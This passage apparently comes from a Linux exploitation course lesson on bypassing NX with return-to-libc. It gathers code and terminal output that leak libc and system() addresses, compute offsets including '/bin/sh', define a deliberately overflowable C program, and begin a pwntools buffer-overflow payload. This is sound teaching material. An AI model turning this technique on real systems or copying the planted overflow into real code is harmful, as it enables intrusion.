#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
int main() {
puts("This program helps visualise where libc is loaded.\n");
int pid = getpid();
char command[500];
puts("Memory Layout: ");
sprintf(command, "cat /proc/%d/maps", pid);
system(command);
puts("\nFunction Addresses: ");
printf("System@libc 0x%lx\n", dlsym(RTLD_NEXT, "system"));
printf("PID: %d\n", pid);
puts("Press enter to continue.");
read(0, command, 1);
}amon@bethany:~/sproink/linux-exploitation-course/lessons/7_bypass_nx_ret2libc/build$ ./1_reveal_addresses
This program helps visualise where libc is loaded.
Memory Layout:
08048000-08049000 r-xp 00000000 00:27 329 /vagrant/lessons/7_bypass_nx_ret2libc/build/1_reveal_addresses
08049000-0804a000 r--p 00000000 00:27 329 /vagrant/lessons/7_bypass_nx_ret2libc/build/1_reveal_addresses
0804a000-0804b000 rw-p 00001000 00:27 329 /vagrant/lessons/7_bypass_nx_ret2libc/build/1_reveal_addresses
0804b000-0806c000 rw-p 00000000 00:00 0 [heap]
f7e0f000-f7e10000 rw-p 00000000 00:00 0
f7e10000-f7fbf000 r-xp 00000000 08:01 256310 /lib/i386-linux-gnu/libc-2.23.so
f7fbf000-f7fc0000 ---p 001af000 08:01 256310 /lib/i386-linux-gnu/libc-2.23.so
f7fc0000-f7fc2000 r--p 001af000 08:01 256310 /lib/i386-linux-gnu/libc-2.23.so
f7fc2000-f7fc3000 rw-p 001b1000 08:01 256310 /lib/i386-linux-gnu/libc-2.23.so
f7fc3000-f7fc6000 rw-p 00000000 00:00 0
f7fc6000-f7fc9000 r-xp 00000000 08:01 256309 /lib/i386-linux-gnu/libdl-2.23.so
f7fc9000-f7fca000 r--p 00002000 08:01 256309 /lib/i386-linux-gnu/libdl-2.23.so
f7fca000-f7fcb000 rw-p 00003000 08:01 256309 /lib/i386-linux-gnu/libdl-2.23.so
f7fd4000-f7fd6000 rw-p 00000000 00:00 0
f7fd6000-f7fd8000 r--p 00000000 00:00 0 [vvar]
f7fd8000-f7fd9000 r-xp 00000000 00:00 0 [vdso]
f7fd9000-f7ffb000 r-xp 00000000 08:01 256300 /lib/i386-linux-gnu/ld-2.23.so
f7ffb000-f7ffc000 rw-p 00000000 00:00 0
f7ffc000-f7ffd000 r--p 00022000 08:01 256300 /lib/i386-linux-gnu/ld-2.23.so
f7ffd000-f7ffe000 rw-p 00023000 08:01 256300 /lib/i386-linux-gnu/ld-2.23.so
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
Function Addresses:
System@libc 0xf7e4ada0
PID: 20738
Press enter to continue.In [15]: 0xf7e4ada0-0xf7e10000
Out[15]: 241056
In [16]: hex(0xf7e4ada0-0xf7e10000)
Out[16]: '0x3ada0'ubuntu@ubuntu-xenial:/vagrant/lessons/7_bypass_nx_ret2libc/build$ objdump -d /lib/i386-linux-gnu/libc-2.23.so | grep system
0003ada0 <__libc_system@@GLIBC_PRIVATE>:
3adb4: 74 0a je 3adc0 <__libc_system@@GLIBC_PRIVATE+0x20>
00112d60 <svcerr_systemerr@@GLIBC_2.0>:This program helps visualise where libc is loaded.
Memory Layout:
00400000-00401000 r-xp 00000000 08:06 17434884 /home/amon/sproink/linux-exploitation-course/lessons/7_bypass_nx_ret2libc/build/2_reveal_addresses64
00600000-00601000 r--p 00000000 08:06 17434884 /home/amon/sproink/linux-exploitation-course/lessons/7_bypass_nx_ret2libc/build/2_reveal_addresses64
00601000-00602000 rw-p 00001000 08:06 17434884 /home/amon/sproink/linux-exploitation-course/lessons/7_bypass_nx_ret2libc/build/2_reveal_addresses64
01609000-0162a000 rw-p 00000000 00:00 0 [heap]
7f649ccfe000-7f649cebd000 r-xp 00000000 08:06 262743 /lib/x86_64-linux-gnu/libc-2.23.so
7f649cebd000-7f649d0bd000 ---p 001bf000 08:06 262743 /lib/x86_64-linux-gnu/libc-2.23.so
7f649d0bd000-7f649d0c1000 r--p 001bf000 08:06 262743 /lib/x86_64-linux-gnu/libc-2.23.so
7f649d0c1000-7f649d0c3000 rw-p 001c3000 08:06 262743 /lib/x86_64-linux-gnu/libc-2.23.so
7f649d0c3000-7f649d0c7000 rw-p 00000000 00:00 0
7f649d0c7000-7f649d0ca000 r-xp 00000000 08:06 262742 /lib/x86_64-linux-gnu/libdl-2.23.so
7f649d0ca000-7f649d2c9000 ---p 00003000 08:06 262742 /lib/x86_64-linux-gnu/libdl-2.23.so
7f649d2c9000-7f649d2ca000 r--p 00002000 08:06 262742 /lib/x86_64-linux-gnu/libdl-2.23.so
7f649d2ca000-7f649d2cb000 rw-p 00003000 08:06 262742 /lib/x86_64-linux-gnu/libdl-2.23.so
7f649d2cb000-7f649d2f1000 r-xp 00000000 08:06 262410 /lib/x86_64-linux-gnu/ld-2.23.so
7f649d4cd000-7f649d4d0000 rw-p 00000000 00:00 0
7f649d4ee000-7f649d4f0000 rw-p 00000000 00:00 0
7f649d4f0000-7f649d4f1000 r--p 00025000 08:06 262410 /lib/x86_64-linux-gnu/ld-2.23.so
7f649d4f1000-7f649d4f2000 rw-p 00026000 08:06 262410 /lib/x86_64-linux-gnu/ld-2.23.so
7f649d4f2000-7f649d4f3000 rw-p 00000000 00:00 0
7ffd9f7b7000-7ffd9f7d8000 rw-p 00000000 00:00 0 [stack]
7ffd9f7e0000-7ffd9f7e2000 r--p 00000000 00:00 0 [vvar]
7ffd9f7e2000-7ffd9f7e4000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
Function Addresses:
System@libc 0x7f649cd43390
PID: 16781
Press enter to continue.In [17]: 0x7f649cd43390-0x7f649ccfe000
Out[17]: 283536
In [18]: hex(0x7f649cd43390-0x7f649ccfe000)
Out[18]: '0x45390'ubuntu@ubuntu-xenial:/vagrant/lessons/7_bypass_nx_ret2libc/build$ objdump -d /lib/x86_64-linux-gnu/libc-2.23.so | grep system
0000000000045390 <__libc_system@@GLIBC_PRIVATE>:
45393: 74 0b je 453a0 <__libc_system@@GLIBC_PRIVATE+0x10>
0000000000137c20 <svcerr_systemerr@@GLIBC_2.2.5>:ubuntu@ubuntu-xenial:~/libc-database$ ./identify /lib/i386-linux-gnu/libc-2.23.so
id local-03ffe08ba6d5e7f5b1d647f6a14e6837938e3bed
ubuntu@ubuntu-xenial:~/libc-database$ ./dump local-03ffe08ba6d5e7f5b1d647f6a14e6837938e3bed
offset___libc_start_main_ret = 0x18637
offset_system = 0x0003ada0
offset_dup2 = 0x000d6190
offset_read = 0x000d5980
offset_write = 0x000d59f0
offset_str_bin_sh = 0x15b82b
ubuntu@ubuntu-xenial:~/libc-database$#include <stdio.h>
#include <stdlib.h>
void vuln() {
char buffer[64];
read(0, buffer, 96);
}
int main() {
vuln();
}ubuntu@ubuntu-xenial:/vagrant/lessons/7_bypass_nx_ret2libc/build$ ./3_vulnerable
TEST
ubuntu@ubuntu-xenial:/vagrant/lessons/7_bypass_nx_ret2libc/build$#!/usr/bin/python
from pwn import *
def main():
# Start the process
p = process("../build/3_vulnerable")
# Print the pid
raw_input(str(p.proc.pid))
# Craft the payload
payload = "A"*76 + p32(0xdeadc0de)
payload = payload.ljust(96, "\x00")
# Send the payload
p.send(payload)
# Pass interaction to the user
p.interactive()
if __name__ == "__main__":
main()